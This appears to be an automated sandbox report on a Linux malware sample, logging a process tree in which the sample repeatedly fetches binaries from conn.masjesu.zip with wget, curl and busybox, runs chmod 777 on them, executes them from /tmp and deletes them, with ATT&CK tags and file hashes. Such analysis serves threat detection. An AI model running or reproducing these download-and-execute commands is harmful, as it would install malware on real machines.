-
-
/bin/chmodchmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:941
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- System Network Configuration Discovery
PID:942
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- System Network Configuration Discovery
PID:945
-
-
/bin/chmodchmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:948
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:949
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- System Network Configuration Discovery
PID:952
-
-
/bin/chmodchmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:956
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:957
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:960
-
-
/bin/chmodchmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:964
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- System Network Configuration Discovery
PID:965
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- System Network Configuration Discovery
PID:968
-
-
/bin/chmodchmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:971
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- System Network Configuration Discovery
PID:972
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- System Network Configuration Discovery
PID:975
-
-
/bin/chmodchmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:978
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- System Network Configuration Discovery
PID:979
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- System Network Configuration Discovery
PID:982
-
-
/bin/chmodchmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- System Network Configuration Discovery
PID:989
-
-
/bin/chmodchmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- System Network Configuration Discovery
PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:996
-
-
/bin/chmodchmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- System Network Configuration Discovery
PID:1003
-
-
/bin/chmodchmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:1006
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
176B
MD5e1732e70f015e99d14dff1eeeaec9966
SHA1c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA2566de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA5126ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97